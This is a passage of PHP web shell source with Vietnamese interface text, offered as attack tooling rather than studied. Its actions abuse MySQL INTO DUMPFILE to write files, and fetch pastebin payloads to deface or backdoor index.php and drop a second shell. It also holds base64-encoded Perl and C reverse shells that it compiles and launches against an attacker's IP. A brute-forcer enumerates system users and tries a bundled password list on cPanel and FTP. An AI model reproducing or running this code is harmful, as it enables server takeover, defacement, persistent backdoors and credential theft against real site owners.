689. p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">T&#7843;i xu&#7889;ng</a> - <a href="javascript:dofile(\'delfiles\');">X&#243;a</a></td><td colspan="4" align="right">'.$dir_i.' Th&#432; m&#7909;c / '.$file_i.' T&#7879;p tin</td></tr>');
690. p('</form></table>');
691. }// end dir
692.  
693. elseif ($action == 'sqlfile') {
694. if($doing=="mysqlupload"){
695. $file = $_FILES['uploadfile'];
696. $filename = $file['tmp_name'];
697. if (file_exists($savepath)) {
698. m('The goal file has already existed');
699. } else {
700. if(!$filename) {
701. m('Please choose a file');
702. } else {
703. $fp=@fopen($filename,'r');
704. $contents=@fread($fp, filesize($filename));
705. @fclose($fp);
706. $contents = bin2hex($contents);
707. if(!$upname) $upname = $file['name'];
708. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
709. $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
710. m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
711. }
712. }
713. }
714. ?>
715. <script type="text/javascript">
716. function mysqlfile(doing){
717. if(!doing) return;
718. $('doing').value=doing;
719. $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
720. $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
721. $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
722. $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
723. $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
724. $('mysqlfile').charset.value=$('dbinfo').charset.value;
725. $('mysqlfile').submit();
726. }
727. </script>
728. <?php
729. !$dbhost && $dbhost = 'localhost';
730. !$dbuser && $dbuser = 'root';
731. !$dbport && $dbport = '3306';
732. $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
733. formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
734. makehide('action','sqlfile');
735. p('<p>');
736. p('DBHost:');
737. makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
738. p(':');
739. makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
740. p('DBUser:');
741. makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
742. p('DBPass:');
743. makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
744. p('DBName:');
745. makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
746. p('DBCharset:');
747. makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
748. p('</p>');
749. formfoot();
750. p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
751. p('<h2>T&#7843;i l&#234;n</h2>');
752. p('<p><b>&#272;&#7875; s&#7917; d&#7909;ng, user ph&#7843;i c&#243; quy&#7873;n file</b></p>');
753. p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Ch&#7885;n file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">T&#7843;i l&#234;n</a></p>');
754. p('<h2>T&#7843;i xu&#7889;ng</h2>');
755. p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">T&#7843;i xu&#7889;ng</a></p>');
756. makehide('dbhost');
757. makehide('dbport');
758. makehide('dbuser');
759. makehide('dbpass');
760. makehide('dbname');
761. makehide('charset');
762. makehide('doing');
763. makehide('action','sqlfile');
764. p('</form>');
765. }
766.  
767. elseif ($action == 'sqladmin') {
768. !$dbhost && $dbhost = 'localhost';
769. !$dbuser && $dbuser = 'root';
770. !$dbport && $dbport = '3306';
771. $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
772. if(isset($dbhost)){
773. $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
774. }
775. if(isset($dbuser)) {
776. $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
777. }
778. if(isset($dbpass)) {
779. $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
780. }
781. if(isset($dbport)) {
782. $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
783. }
784. if(isset($dbname)) {
785. $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
786. }
787. if(isset($charset)) {
788. $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
789. }
790.  
791. if ($doing == 'backupmysql' && $saveasfile) {
792. if (!$table) {
793. m('Please choose the table');
794. } else {
795. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
796. $table = array_flip($table);
797. $fp = @fopen($path,'w');
798. if ($fp) {
799. $result = q('SHOW tables');
800. if (!$result) p('<h2>'.mysql_error().'</h2>');
801. $mysqldata = '';
802. while ($currow = mysql_fetch_array($result)) {
803. if (isset($table[$currow[0]])) {
804. sqldumptable($currow[0], $fp);
805. }
806. }
807. fclose($fp);
808. $fileurl = str_replace(SA_ROOT,'',$path);
809. m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
810. mysql_close();
811. } else {
812. m('Backup failed');
813. }
814. }
815. }
816. if ($insert && $insertsql) {
817. $keystr = $valstr = $tmp = '';
818. foreach($insertsql as $key => $val) {
819. if ($val) {
820. $keystr .= $tmp.$key;
821. $valstr .= $tmp."'".addslashes($val)."'";
822. $tmp = ',';
823. }
824. }
825. if ($keystr && $valstr) {
826. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
827. m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Ch&#232;n b&#7843;n ghi m&#7899;i th&#224;nh c&#244;ng' : mysql_error());
828. }
829. }
830. if ($update && $insertsql && $base64) {
831. $valstr = $tmp = '';
832. foreach($insertsql as $key => $val) {
833. $valstr .= $tmp.$key."='".addslashes($val)."'";
834. $tmp = ',';
835. }
836. if ($valstr) {
837. $where = base64_decode($base64);
838. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
839. m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'C&#7853;p nh&#7853;t b&#7843;n ghi' : mysql_error());
840. }
841. }
842. if ($doing == 'del' && $base64) {
843. $where = base64_decode($base64);
844. $delete_sql = "DELETE FROM $tablename WHERE $where";
845. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
846. m(q("DELETE FROM $tablename WHERE $where") ? 'X&#243;a b&#7843;n ghi th&#224;nh c&#244;ng' : mysql_error());
847. }
848.  
849. if ($tablename && $doing == 'drop') {
850. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
851. if (q("DROP TABLE $tablename")) {
852. m('Drop table of success');
853. $tablename = '';
854. } else {
855. m(mysql_error());
856. }
857. }
858.  
859. $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
860.  
861. formhead(array('title'=>'MYSQL Manager'));
862. makehide('action','sqladmin');
863. p('<p>');
864. p('DBHost:');
865. makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
866. p(':');
867. makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
868. p('DBUser:');
869. makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
870. p('DBPass:');
871. makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
872. p('DBCharset:');
873. makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
874. makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
875. p('</p>');
876. formfoot();
877. ?>
878. <script type="text/javascript">
879. function editrecord(action, base64, tablename){
880. if (action == 'del') {
881. if (!confirm('Is or isn\'t deletion record?')) return;
882. }
883. $('recordlist').doing.value=action;
884. $('recordlist').base64.value=base64;
885. $('recordlist').tablename.value=tablename;
886. $('recordlist').submit();
887. }
888. function moddbname(dbname) {
889. if(!dbname) return;
890. $('setdbname').dbname.value=dbname;
891. $('setdbname').submit();
892. }
893. function settable(tablename,doing,page) {
894. if(!tablename) return;
895. if (doing) {
896. $('settable').doing.value=doing;
897. }
898. if (page) {
899. $('settable').page.value=page;
900. }
901. $('settable').tablename.value=tablename;
902. $('settable').submit();
903. }
904. </script>
905. <?php
906. // SQL
907. formhead(array('name'=>'recordlist'));
908. makehide('doing');
909. makehide('action','sqladmin');
910. makehide('base64');
911. makehide('tablename');
912. p($dbform);
913. formfoot();
914.  
915. // Data
916. formhead(array('name'=>'setdbname'));
917. makehide('action','sqladmin');
918. p($dbform);
919. if (!$dbname) {
920. makehide('dbname');
921. }
922. formfoot();
923.  
924.  
925. formhead(array('name'=>'settable'));
926. makehide('action','sqladmin');
927. p($dbform);
928. makehide('tablename');
929. makehide('page',$page);
930. makehide('doing');
931. formfoot();
932.  
933. $cachetables = array();
934. $pagenum = 30;
935. $page = intval($page);
936. if($page) {
937. $start_limit = ($page - 1) * $pagenum;
938. } else {
939. $start_limit = 0;
940. $page = 1;
941. }
942. if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
943. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
944. // get mysql server
945. $mysqlver = mysql_get_server_info();
946. p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
947. $highver = $mysqlver > '4.1' ? 1 : 0;
948.  
949. // Show database
950. $query = q("SHOW DATABASES");
951. $dbs = array();
952. $dbs[] = '-- Select a database --';
953. while($db = mysql_fetch_array($query)) {
954. $dbs[$db['Database']] = $db['Database'];
955. }
956. makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
957. $tabledb = array();
958. if ($dbname) {
959. p('<p>');
960. p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
961. if ($tablename) {
962. p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
963. }
964. p('</p>');
965. mysql_select_db($dbname);
966.  
967. $getnumsql = '';
968. $runquery = 0;
969. if ($sql_query) {
970. $runquery = 1;
971. }
972. $allowedit = 0;
973. if ($tablename && !$sql_query) {
974. $sql_query = "SELECT * FROM $tablename";
975. $getnumsql = $sql_query;
976. $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
977. $allowedit = 1;
978. }
979. p('<form action="'.$self.'" method="POST">');
980. p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
981. </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
982. makehide('tablename', $tablename);
983. makehide('action','sqladmin');
984. p($dbform);
985. p('</form>');
986. if ($tablename || ($runquery && $sql_query)) {
987. if ($doing == 'structure') {
988. $result = q("SHOW COLUMNS FROM $tablename");
989. $rowdb = array();
990. while($row = mysql_fetch_array($result)) {
991. $rowdb[] = $row;
992. }
993. p('<table border="0" cellpadding="3" cellspacing="0">');
994. p('<tr class="head">');
995. p('<td>Field</td>');
996. p('<td>Type</td>');
997. p('<td>Null</td>');
998. p('<td>Key</td>');
999. p('<td>Default</td>');
1000. p('<td>Extra</td>');
1001. p('</tr>');
1002. foreach ($rowdb as $row) {
1003. $thisbg = bg();
1004. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1005. p('<td>'.$row['Field'].'</td>');
1006. p('<td>'.$row['Type'].'</td>');
1007. p('<td>'.$row['Null'].'&nbsp;</td>');
1008. p('<td>'.$row['Key'].'&nbsp;</td>');
1009. p('<td>'.$row['Default'].'&nbsp;</td>');
1010. p('<td>'.$row['Extra'].'&nbsp;</td>');
1011. p('</tr>');
1012. }
1013. tbfoot();
1014. } elseif ($doing == 'insert' || $doing == 'edit') {
1015. $result = q('SHOW COLUMNS FROM '.$tablename);
1016. while ($row = mysql_fetch_array($result)) {
1017. $rowdb[] = $row;
1018. }
1019. $rs = array();
1020. if ($doing == 'insert') {
1021. p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
1022. } else {
1023. p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
1024. $where = base64_decode($base64);
1025. $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1026. $rs = mysql_fetch_array($result);
1027. }
1028. p('<form method="post" action="'.$self.'">');
1029. p($dbform);
1030. makehide('action','sqladmin');
1031. makehide('tablename',$tablename);
1032. p('<table border="0" cellpadding="3" cellspacing="0">');
1033. foreach ($rowdb as $row) {
1034. if ($rs[$row['Field']]) {
1035. $value = htmlspecialchars($rs[$row['Field']]);
1036. } else {
1037. $value = '';
1038. }
1039. $thisbg = bg();
1040. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1041. p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1042. }
1043. if ($doing == 'insert') {
1044. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Ch&#232;n" /></td></tr>');
1045. } else {
1046. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="C&#7853;p nh&#7853;t" /></td></tr>');
1047. makehide('base64', $base64);
1048. }
1049. p('</table></form>');
1050. } else {
1051. $querys = @explode(';',$sql_query);
1052. foreach($querys as $num=>$query) {
1053. if ($query) {
1054. p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1055. switch(qy($query))
1056. {
1057. case 0:
1058. p('<h2>Error : '.mysql_error().'</h2>');
1059. break;
1060. case 1:
1061. if (strtolower(substr($query,0,13)) == 'select * from') {
1062. $allowedit = 1;
1063. }
1064. if ($getnumsql) {
1065. $tatol = mysql_num_rows(q($getnumsql));
1066. $multipage = multi($tatol, $pagenum, $page, $tablename);
1067. }
1068. if (!$tablename) {
1069. $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1070. $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1071. preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1072. $tablename = $matches[1][0];
1073. }
1074. $result = q($query);
1075. p($multipage);
1076. p('<table border="0" cellpadding="3" cellspacing="0">');
1077. p('<tr class="head">');
1078. if ($allowedit) p('<td>Action</td>');
1079. $fieldnum = @mysql_num_fields($result);
1080. for($i=0;$i<$fieldnum;$i++){
1081. $name = @mysql_field_name($result, $i);
1082. $type = @mysql_field_type($result, $i);
1083. $len = @mysql_field_len($result, $i);
1084. p("<td nowrap>$name<br><span>$type($len)</span></td>");
1085. }
1086. p('</tr>');
1087. while($mn = @mysql_fetch_assoc($result)){
1088. $thisbg = bg();
1089. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1090. $where = $tmp = $b1 = '';
1091. foreach($mn as $key=>$inside){
1092. if ($inside) {
1093. $where .= $tmp.$key."='".addslashes($inside)."'";
1094. $tmp = ' AND ';
1095. }
1096. $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
1097. }
1098. $where = base64_encode($where);
1099. if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">S&#7917;a</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">X&#243;a</a></td>');
1100. p($b1);
1101. p('</tr>');
1102. unset($b1);
1103. }
1104. tbfoot();
1105. p($multipage);
1106. break;
1107. case 2:
1108. $ar = mysql_affected_rows();
1109. p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1110. break;
1111. }
1112. }
1113. }
1114. }
1115. } else {
1116. $query = q("SHOW TABLE STATUS");
1117. $table_num = $table_rows = $data_size = 0;
1118. $tabledb = array();
1119. while($table = mysql_fetch_array($query)) {
1120. $data_size = $data_size + $table['Data_length'];
1121. $table_rows = $table_rows + $table['Rows'];
1122. $table['Data_length'] = sizecount($table['Data_length']);
1123. $table_num++;
1124. $tabledb[] = $table;
1125. }
1126. $data_size = sizecount($data_size);
1127. unset($table);
1128. p('<table border="0" cellpadding="0" cellspacing="0">');
1129. p('<form action="'.$self.'" method="POST">');
1130. makehide('action','sqladmin');
1131. p($dbform);
1132. p('<tr class="head">');
1133. p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1134. p('<td>Name</td>');
1135. p('<td>Rows</td>');
1136. p('<td>Data_length</td>');
1137. p('<td>Create_time</td>');
1138. p('<td>Update_time</td>');
1139. if ($highver) {
1140. p('<td>Engine</td>');
1141. p('<td>Collation</td>');
1142. }
1143. p('</tr>');
1144. foreach ($tabledb as $key => $table) {
1145. $thisbg = bg();
1146. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1147. p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1148. p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Ch&#232;n</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">X&#243;a</a> ]</td>');
1149. p('<td>'.$table['Rows'].'</td>');
1150. p('<td>'.$table['Data_length'].'</td>');
1151. p('<td>'.$table['Create_time'].'</td>');
1152. p('<td>'.$table['Update_time'].'</td>');
1153. if ($highver) {
1154. p('<td>'.$table['Engine'].'</td>');
1155. p('<td>'.$table['Collation'].'</td>');
1156. }
1157. p('</tr>');
1158. }
1159. p('<tr class=fout>');
1160. p('<td>&nbsp;</td>');
1161. p('<td>Total tables: '.$table_num.'</td>');
1162. p('<td>'.$table_rows.'</td>');
1163. p('<td>'.$data_size.'</td>');
1164. p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
1165. p('</tr>');
1166.  
1167. p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> L&#432;u d&#432;&#7899;i d&#7841;ng <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Xu&#7845;t table &#273;&#227; ch&#7885;n\" /></td></tr>");
1168. makehide('doing','backupmysql');
1169. formfoot();
1170. p("</table>");
1171. fr($query);
1172. }
1173. }
1174. }
1175. tbfoot();
1176. @mysql_close();
1177. }//end sql backup
1178. //code them vao// ====================================================================================================================//
1179. //begin encode//
1180. elseif ($action == 'encode') {
1181.  
1182.  
1183. }
1184. //end encode//==================================================================================================
1185. //begin deface//
1186. elseif ($action == 'deface') {
1187. $index = 'http://pastebin.com/raw.php?i=g9u9hYvH';
1188. $get18 = file_get_contents($index);
1189. $nam18 = fopen('index.php', 'w');
1190. fwrite($nam18,$get18);
1191. fclose($nam18);
1192. echo '<center><p align="center" dir="ltr"><h3><font face="Orbitron" style="color:white;text-shadow: 0 0 1.9em green,0 0 0.3em green;"></h3>Pack index Th&#224;nh C&#244;ng .. Open index </font>[ <a href="index.php" target="_blank">V&#224;o index</a> ]</font></p></center>';
1193. }
1194. //end deface//==================================================================================================
1195. //begin extract//
1196. elseif ($action == 'extract') {
1197. $extract = 'http://pastebin.com/raw.php?i=zGRBPbbH';
1198. $ex = file_get_contents($extract);
1199. $nam1 = fopen('extract-shell.php', 'w');
1200. fwrite($nam1,$ex);
1201. fclose($nam1);
1202. echo "<iframe src='extract-shell.php' width='100%' height='500'></iframe>";
1203. }
1204. //end extract shell//===========================================================================================
1205.  
1206. //begin backdoor//
1207. elseif ($action == 'backdoor') {
1208. $back = 'http://pastebin.com/raw.php?i=7nZ5WiPS';
1209. $backdoor = file_get_contents($back);
1210. $bd = fopen('index.php', 'a');
1211. fwrite($bd,$backdoor);
1212. fclose($bd);
1213. echo "<center><h2><font face='Orbitron' style='color:white;text-shadow: 0 0 1.9em green,0 0 0.3em green;'>Đặt backdoor thành công</font></h2></center>";
1214. echo "<center><h2><font face='Orbitron' style='color:white;text-shadow: 0 0 1.9em green,0 0 0.3em green;'>Vào backdoor<a href='/index.php?vhs=ls'> Comand</a></font></h2></center>";
1215. }
1216.  
1217.  
1218.  
1219. //====================================================================================================================================//
1220. elseif ($action == 'backconnect') {
1221. !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1222. !$yourport && $yourport = '12345';
1223. $usedb = array('perl'=>'perl','c'=>'c');
1224.  
1225. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1226. "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1227. "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1228. "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1229. "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1230. "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1231. "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1232. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1233. "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1234. "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1235. "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1236. "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1237. "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1238. "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1239. "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1240.  
1241. if ($start && $yourip && $yourport && $use){
1242. if ($use == 'perl') {
1243. cf('/tmp/angel_bc',$back_connect);
1244. $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1245. } else {
1246. cf('/tmp/angel_bc.c',$back_connect_c);
1247. $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1248. @unlink('/tmp/angel_bc.c');
1249. $res = execute("/tmp/angel_bc $yourip $yourport &");
1250. }
1251. m("Th&#7917; k&#7871;t n&#7889;i $yourip port $yourport ...");
1252. }
1253.  
1254. formhead(array('title'=>'Back Connect'));
1255. makehide('action','backconnect');
1256. p('<p>');
1257. p('Your IP:');
1258. makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1259. p('Your Port:');
1260. makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1261. p('Use:');
1262. makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1263. makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1264. p('</p>');
1265. formfoot();
1266. }//end backconnect window via NC
1267.  
1268. // Brute
1269. elseif ($action == 'brute') {
1270. formhead(array('title'=>'Brute Forcer'));
1271. makehide('action','brute');
1272. makehide('dir',$brute);
1273. @ini_set('memory_limit', 1000000000000);
1274. $connect_timeout=5;
1275. @set_time_limit(0);
1276. $submit = $_REQUEST['submit'];
1277. $users = $_REQUEST['users'];
1278. $pass = $_REQUEST['passwords'];
1279. $target = $_REQUEST['target'];
1280. $option = $_REQUEST['option'];
1281.  
1282.  
1283. $passlist = "0123456
1284. 01234567
1285. 012345678
1286. 0123456789
1287. 01234567890
1288. 123456
1289. 1234567
1290. 12345678
1291. 123456789
1292. 1234567890
1293. 111111
1294. 000000
1295. 222222
1296. 333333
1297. 444444
1298. 555555
1299. 666666
1300. 777777
1301. 888888
1302. 999999
1303. 123123
1304. 456456
1305. 789789
1306. 123321
1307. 456654
1308. 654321
1309. 7654321
1310. 87654321
1311. 987654321
1312. 0987654321
1313. admin
1314. administrator
1315. admincp
1316. cpanel
1317. adminx
1318. admins
1319. password
1320. passwords
1321. passw0rd
1322. p@ssw0rd
1323. p@ssword
1324. khongco
1325. 25251325
1326. passw0rds";
1327. if($target == ''){
1328. $target = 'localhost';
1329. }
1330. print " <div align='center'>
1331. <form method='post' style='border: 1px solid #000000'><br><br>
1332. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1333. <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1334. <div align='center'><br>
1335. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1336. <tr>
1337. <td align='center'>
1338. <b>Username</b></td>
1339. <td>
1340. <p align='center'>
1341. <b>Password</b></td>
1342. </tr>
1343. </table>
1344. <p align='center'>
1345. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1346. $i = 0;
1347. while ($i < 60000) {
1348.  
1349. $line = posix_getpwuid($i);
1350. if (!empty($line)) {
1351.  
1352. while (list ($key, $vba_etcpwd) = each($line)){
1353. echo "".$vba_etcpwd."\n";
1354. break;
1355. }
1356.  
1357. }
1358.  
1359. $i++;
1360. }
1361. echo "
1362. </textarea>
1363. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1364. <br>
1365. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1366. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1367. </td></tr></table></td></tr></form><p align= 'left'>";
1368. ?>
1369. <?php
1370. function ftp_check($host,$user,$pass,$timeout){
1371. $ch = curl_init();
1372. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1373. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1374. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1375. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1376. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1377. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1378. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1379. $data = curl_exec($ch);
1380. if ( curl_errno($ch) == 28 ) {
1381.  
1382. print "<b> L&#7895;i : Connection timed out , make confidence about validation of target !</b>";
1383. exit;}
1384.  
1385. elseif ( curl_errno($ch) == 0 ){
1386.  
